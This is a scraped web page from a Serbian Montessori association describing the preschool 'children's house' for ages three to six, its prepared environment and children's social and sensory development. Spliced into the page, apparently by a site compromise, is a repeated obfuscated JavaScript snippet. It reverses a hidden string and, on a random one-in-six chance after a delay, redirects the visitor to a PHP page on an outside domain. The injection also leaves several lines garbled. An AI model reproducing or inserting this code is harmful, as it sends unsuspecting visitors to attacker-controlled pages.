DEČIJA KUĆA - Asocijacija Montessori Srbija - AMS
10223
page,page-id-10223,page-template-default,ajax_fade,page_not_loaded,,vertical_menu_enabled,qode-title-hidden,columns-3,qode-theme-ver-10.0,wpb-js-composer js-comp-ver-4.12.1,vc_responsive

Dečja Kuća

[vc_separator type=”normal” position=”center” thickness=”15″ down=”30″]

Vrtić – “Razvitak dece od 3.-6. godina je važniji nego celokupni razvoj od 6.-77. godine”

[vc_separator type=”normal” position=”center” thickness=”10″]

Kada se deca u zajednici male dece približavaju trećoj godini, pokazuju znake spremnosti za dečiju kuću, predškolsku učionicu od treće do šeste godine, koja je mnogo značajna za dalji razvoj. Posle perioda intenzivnog otkrivanja i istraživanja, izgledaju skoro kao da se odmaraju. Manje su zahtevna i odraslima je lakše da se s njima slože.

businessknowledge
Childhood_Church_S$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tock_Pho$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tos

Marija Montesori je zaključila da se tada odigrava promena nesvesnog u svesni upijajući um i da su deca spremna za prefinjenija čulna iskustva. Zato je osmislila pripremljeno okruženje, koje je više od zajednice male dece. Ovo novo okruženje predstavlja za decu most ka spoljnom svetu.

Razvoj ličnosti i socijalno ponašanje, kao suštinski aspekti Montesori obrazovanja, najvažniji su u dečijoj kući i za samoizgradnju dece. Lepo ponašanje, Ijubaznost, poverenje i lakoća komunikacije s mladima i starijima od sebe, uključujući odrasle, briga o okruženju, želja i energija za učenjem, osnovni su potencijali predškolske Montesori učionice.

dreamstimeextrasmall_20124214
Stedman_Childrens_Budget_Tshirt_model

Pažljiva priprema fizičkog okruženja, materijali i aktivnosti u njemu nisu jedino što dovodi do pozitivnih rezultata u dečijem ponašanju. To je i socijalna struktura u učionici. U njoj se nalaze ključevi istraživanja, jer se u jednu sobu ne može staviti ceo svet za dečije istraživanje.     Kada je deci data sloboda uz ova posebna sredstva, koja predstavljaju tačku kontakta, ona dosledno pokazuju ljubav prema redu, koncentraciju i preciznosti. Prisustvujući ovom fenomenu kod dece širom sveta i iz različitih sredina, Marija Montesori je ovo zaključila.

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom_1442575586180{margin-top: 20px !important;border-top-width: 20px !important;padding-top: 20px !important;}”]

“Kroz rad deca organizuju svoje ličnosti.”

Čulo dodira je za mlađi uzrast dece isto što i mašta za stariju decu.Vežbe koje biraju kao da odgovaraju nekoj unutrašnjoj potrebi deteta.Na onom mlađem uzrastu, bavimo se sa decom na senzornom planu, dok u starijom radimo na planu imaginacije. Tako se na različitim nivoima susrećemo sa različitim fenomenima.

988900_10152676574480846_4830493596944385678_n
iS$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tock_000009867137Large1

Decja kuca Razdoblje od 3 do 6 godinaMarija Montessori je postavila izuzetno stroga merila za izgled enterijera I eksterijera (okoline) I ponasanje odraslih u Montessori Decjoj kuci. Enterijer I eksterijer je primeren potrebama deteta  nudi sve sto detetu treba za telesno, umno, duhovno I dusevno prilagodjavanje – to M.Montessori zove pripremljenom okolinom. Ona igra kljucnu ulogu u razvoju deteta.